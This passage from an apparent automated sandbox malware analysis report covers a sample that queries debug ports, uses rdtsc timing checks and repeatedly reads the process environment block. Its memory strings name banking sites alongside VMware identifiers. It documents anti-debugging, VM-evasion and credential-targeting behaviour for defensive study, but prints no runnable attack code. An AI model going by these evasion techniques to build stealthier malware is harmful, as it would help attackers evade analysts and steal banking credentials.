Source: 62MfV68M.21.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 62MfV68M.21.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 62MfV68M.21.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 62MfV68M.21.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: firefox.exe, 00000018.00000002.2293089661.0000019AAA94C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll)
Source: 62MfV68M.21.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 62MfV68M.21.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 62MfV68M.21.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 62MfV68M.21.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 62MfV68M.21.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 62MfV68M.21.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 62MfV68M.21.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Code function: 9_2_010CD1C0 rdtsc

9_2_010CD1C0

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Code function: 9_2_00417C03 LdrLoadDll,

9_2_00417C03

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01110115 mov eax, dword ptr fs:[00000030h]	9_2_01110115
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FA118 mov ecx, dword ptr fs:[00000030h]	9_2_010FA118
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FA118 mov eax, dword ptr fs:[00000030h]	9_2_010FA118
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FA118 mov eax, dword ptr fs:[00000030h]	9_2_010FA118
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FA118 mov eax, dword ptr fs:[00000030h]	9_2_010FA118
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01080124 mov eax, dword ptr fs:[00000030h]	9_2_01080124
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B136 mov eax, dword ptr fs:[00000030h]	9_2_0104B136
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B136 mov eax, dword ptr fs:[00000030h]	9_2_0104B136
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B136 mov eax, dword ptr fs:[00000030h]	9_2_0104B136
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B136 mov eax, dword ptr fs:[00000030h]	9_2_0104B136
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01051131 mov eax, dword ptr fs:[00000030h]	9_2_01051131
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01051131 mov eax, dword ptr fs:[00000030h]	9_2_01051131
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125152 mov eax, dword ptr fs:[00000030h]	9_2_01125152
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E4144 mov eax, dword ptr fs:[00000030h]	9_2_010E4144
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E4144 mov eax, dword ptr fs:[00000030h]	9_2_010E4144
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E4144 mov ecx, dword ptr fs:[00000030h]	9_2_010E4144
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E4144 mov eax, dword ptr fs:[00000030h]	9_2_010E4144
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E4144 mov eax, dword ptr fs:[00000030h]	9_2_010E4144
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049148 mov eax, dword ptr fs:[00000030h]	9_2_01049148
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049148 mov eax, dword ptr fs:[00000030h]	9_2_01049148
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049148 mov eax, dword ptr fs:[00000030h]	9_2_01049148
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049148 mov eax, dword ptr fs:[00000030h]	9_2_01049148
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E3140 mov eax, dword ptr fs:[00000030h]	9_2_010E3140
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E3140 mov eax, dword ptr fs:[00000030h]	9_2_010E3140
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E3140 mov eax, dword ptr fs:[00000030h]	9_2_010E3140
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01056154 mov eax, dword ptr fs:[00000030h]	9_2_01056154
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01056154 mov eax, dword ptr fs:[00000030h]	9_2_01056154
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104C156 mov eax, dword ptr fs:[00000030h]	9_2_0104C156
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E8158 mov eax, dword ptr fs:[00000030h]	9_2_010E8158
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01057152 mov eax, dword ptr fs:[00000030h]	9_2_01057152
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104F172 mov eax, dword ptr fs:[00000030h]	9_2_0104F172
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E9179 mov eax, dword ptr fs:[00000030h]	9_2_010E9179
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01090185 mov eax, dword ptr fs:[00000030h]	9_2_01090185
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D019F mov eax, dword ptr fs:[00000030h]	9_2_010D019F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D019F mov eax, dword ptr fs:[00000030h]	9_2_010D019F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D019F mov eax, dword ptr fs:[00000030h]	9_2_010D019F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D019F mov eax, dword ptr fs:[00000030h]	9_2_010D019F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A197 mov eax, dword ptr fs:[00000030h]	9_2_0104A197
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A197 mov eax, dword ptr fs:[00000030h]	9_2_0104A197
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A197 mov eax, dword ptr fs:[00000030h]	9_2_0104A197
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110C188 mov eax, dword ptr fs:[00000030h]	9_2_0110C188
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110C188 mov eax, dword ptr fs:[00000030h]	9_2_0110C188
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A7190 mov eax, dword ptr fs:[00000030h]	9_2_010A7190
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011011A4 mov eax, dword ptr fs:[00000030h]	9_2_011011A4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011011A4 mov eax, dword ptr fs:[00000030h]	9_2_011011A4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011011A4 mov eax, dword ptr fs:[00000030h]	9_2_011011A4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011011A4 mov eax, dword ptr fs:[00000030h]	9_2_011011A4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106B1B0 mov eax, dword ptr fs:[00000030h]	9_2_0106B1B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011161C3 mov eax, dword ptr fs:[00000030h]	9_2_011161C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011161C3 mov eax, dword ptr fs:[00000030h]	9_2_011161C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108D1D0 mov eax, dword ptr fs:[00000030h]	9_2_0108D1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108D1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0108D1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011251CB mov eax, dword ptr fs:[00000030h]	9_2_011251CB
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CE1D0 mov eax, dword ptr fs:[00000030h]	9_2_010CE1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CE1D0 mov eax, dword ptr fs:[00000030h]	9_2_010CE1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CE1D0 mov ecx, dword ptr fs:[00000030h]	9_2_010CE1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CE1D0 mov eax, dword ptr fs:[00000030h]	9_2_010CE1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CE1D0 mov eax, dword ptr fs:[00000030h]	9_2_010CE1D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010751EF mov eax, dword ptr fs:[00000030h]	9_2_010751EF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010551ED mov eax, dword ptr fs:[00000030h]	9_2_010551ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010801F8 mov eax, dword ptr fs:[00000030h]	9_2_010801F8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010F71F9 mov esi, dword ptr fs:[00000030h]	9_2_010F71F9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011261E5 mov eax, dword ptr fs:[00000030h]	9_2_011261E5
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D4000 mov ecx, dword ptr fs:[00000030h]	9_2_010D4000
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E016 mov eax, dword ptr fs:[00000030h]	9_2_0106E016
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E016 mov eax, dword ptr fs:[00000030h]	9_2_0106E016
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E016 mov eax, dword ptr fs:[00000030h]	9_2_0106E016
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E016 mov eax, dword ptr fs:[00000030h]	9_2_0106E016
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A020 mov eax, dword ptr fs:[00000030h]	9_2_0104A020
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104C020 mov eax, dword ptr fs:[00000030h]	9_2_0104C020
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111903E mov eax, dword ptr fs:[00000030h]	9_2_0111903E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111903E mov eax, dword ptr fs:[00000030h]	9_2_0111903E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111903E mov eax, dword ptr fs:[00000030h]	9_2_0111903E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111903E mov eax, dword ptr fs:[00000030h]	9_2_0111903E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E6030 mov eax, dword ptr fs:[00000030h]	9_2_010E6030
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010F705E mov ebx, dword ptr fs:[00000030h]	9_2_010F705E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010F705E mov eax, dword ptr fs:[00000030h]	9_2_010F705E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01052050 mov eax, dword ptr fs:[00000030h]	9_2_01052050
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B052 mov eax, dword ptr fs:[00000030h]	9_2_0107B052
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6050 mov eax, dword ptr fs:[00000030h]	9_2_010D6050
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D106E mov eax, dword ptr fs:[00000030h]	9_2_010D106E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125060 mov eax, dword ptr fs:[00000030h]	9_2_01125060
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107C073 mov eax, dword ptr fs:[00000030h]	9_2_0107C073
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov ecx, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01061070 mov eax, dword ptr fs:[00000030h]	9_2_01061070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD070 mov ecx, dword ptr fs:[00000030h]	9_2_010CD070
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104D08D mov eax, dword ptr fs:[00000030h]	9_2_0104D08D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DD080 mov eax, dword ptr fs:[00000030h]	9_2_010DD080
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DD080 mov eax, dword ptr fs:[00000030h]	9_2_010DD080
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105208A mov eax, dword ptr fs:[00000030h]	9_2_0105208A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01055096 mov eax, dword ptr fs:[00000030h]	9_2_01055096
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108909C mov eax, dword ptr fs:[00000030h]	9_2_0108909C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107D090 mov eax, dword ptr fs:[00000030h]	9_2_0107D090
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107D090 mov eax, dword ptr fs:[00000030h]	9_2_0107D090
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E80A8 mov eax, dword ptr fs:[00000030h]	9_2_010E80A8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011160B8 mov eax, dword ptr fs:[00000030h]	9_2_011160B8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011160B8 mov ecx, dword ptr fs:[00000030h]	9_2_011160B8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov ecx, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov ecx, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov ecx, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov ecx, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010670C0 mov eax, dword ptr fs:[00000030h]	9_2_010670C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011250D9 mov eax, dword ptr fs:[00000030h]	9_2_011250D9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD0C0 mov eax, dword ptr fs:[00000030h]	9_2_010CD0C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD0C0 mov eax, dword ptr fs:[00000030h]	9_2_010CD0C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D20DE mov eax, dword ptr fs:[00000030h]	9_2_010D20DE
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010790DB mov eax, dword ptr fs:[00000030h]	9_2_010790DB
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010750E4 mov eax, dword ptr fs:[00000030h]	9_2_010750E4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010750E4 mov ecx, dword ptr fs:[00000030h]	9_2_010750E4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0104A0E3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010580E9 mov eax, dword ptr fs:[00000030h]	9_2_010580E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D60E0 mov eax, dword ptr fs:[00000030h]	9_2_010D60E0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0104C0F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010920F0 mov ecx, dword ptr fs:[00000030h]	9_2_010920F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A30B mov eax, dword ptr fs:[00000030h]	9_2_0108A30B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A30B mov eax, dword ptr fs:[00000030h]	9_2_0108A30B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A30B mov eax, dword ptr fs:[00000030h]	9_2_0108A30B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D930B mov eax, dword ptr fs:[00000030h]	9_2_010D930B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D930B mov eax, dword ptr fs:[00000030h]	9_2_010D930B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D930B mov eax, dword ptr fs:[00000030h]	9_2_010D930B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104C310 mov ecx, dword ptr fs:[00000030h]	9_2_0104C310
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01070310 mov ecx, dword ptr fs:[00000030h]	9_2_01070310
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F32A mov eax, dword ptr fs:[00000030h]	9_2_0107F32A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01047330 mov eax, dword ptr fs:[00000030h]	9_2_01047330
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111132D mov eax, dword ptr fs:[00000030h]	9_2_0111132D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111132D mov eax, dword ptr fs:[00000030h]	9_2_0111132D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111A352 mov eax, dword ptr fs:[00000030h]	9_2_0111A352
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
